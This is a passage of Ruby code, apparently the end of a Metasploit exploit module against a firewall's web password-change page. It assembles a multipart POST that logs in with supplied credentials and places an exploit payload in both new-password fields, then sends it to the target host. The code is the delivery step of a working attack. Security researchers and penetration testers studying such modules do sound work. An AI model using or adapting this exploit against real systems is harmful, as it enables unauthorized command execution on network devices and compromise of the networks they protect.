    data << "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"USERNAME\"\r\n\r\n"
    data << "#{datastore['EFW_USERNAME']}\r\n"
    data << "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"OLD_PASSWORD\"\r\n\r\n"
    data << "#{datastore['EFW_PASSWORD']}\r\n"
    data << "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_1\"\r\n\r\n"
    data << "#{sploit}\r\n"
    data << "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"NEW_PASSWORD_2\"\r\n\r\n"
    data << "#{sploit}\r\n"
    data << "--#{boundary}\r\n"
    data << "Content-Disposition: form-data; name=\"SUBMIT\"\r\n\r\n"
    data << "  Change password\r\n"
    data << "--#{boundary}--\r\n"

    refererUrl = 
      "https://#{datastore['RHOST']}:#{datastore['RPORT']}" + 
      "#{datastore['TARGETURI']}"

    send_request_cgi(
      {
        'method' => 'POST',
        'uri' => datastore['TARGETURI'],
	'ctype' => "multipart/form-data; boundary=#{boundary}",
        'headers' => {
          'Referer' => refererUrl
        },
        'data' => data
      }, datastore['TIMEOUT'])

  end

end